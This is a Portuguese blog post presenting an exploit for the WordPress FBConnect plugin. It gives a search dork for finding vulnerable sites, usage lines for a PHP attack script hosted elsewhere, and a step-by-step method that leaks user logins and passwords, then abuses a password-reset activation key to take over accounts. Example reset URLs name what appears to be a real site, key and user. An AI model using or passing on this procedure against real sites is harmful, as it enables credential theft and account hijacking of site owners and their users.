/*
###################################################################
EXPLOIT CMS WORDPRESS / FBCONNECT
By: GoogleINURL
REF:http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html
REF:http://aurruz.com/post/1790/
DORK['1']:inurl:"/?fbconnect_action=myhome"
###################################################################
*/
Modo de usar:
http://localhost/script.php?url=http://alvo.com.br/
http://localhost/script?url=http://boneramamusic.com/
http://localhost/script.php?url=http://alvo.com.br/compasta
Ao carregar pela primeira vez ele vai tentar exploitar aparecendo dados usuário,login,senha significar que está vull.
O passo seguinte é pedir uma nova senha com usuário que temos acesso.
Quando efetuar o pedido seria enviado uma KEY de ativação para o email do usuario, no qual a mesma KEY fica no BD do wordpress.
O envio concluido dé um refresh na pagina onde podemos observar que aparece alem de usuario & senha tem agora o USE_ACTIVATION_KEY
E uma URL já formata para trocar a senha do usuário.
http://boneramamusic.com/wp-login.php?action=rp&key=[USE_ACTIVATION_KEY]&login=[USER]
http://boneramamusic.com/wp-login.php?action=rp&key=smnw8z7n70mG0ubbT91j&login=Mark Mullins
SCRIPT: http://pastebin.com/CysgK2Zf
Porem creio que já foi corrigido essa falha, mas está aé o script para estudar e criar exploits futuros.
Este comentário foi removido por um administrador do blog.
ResponderExcluir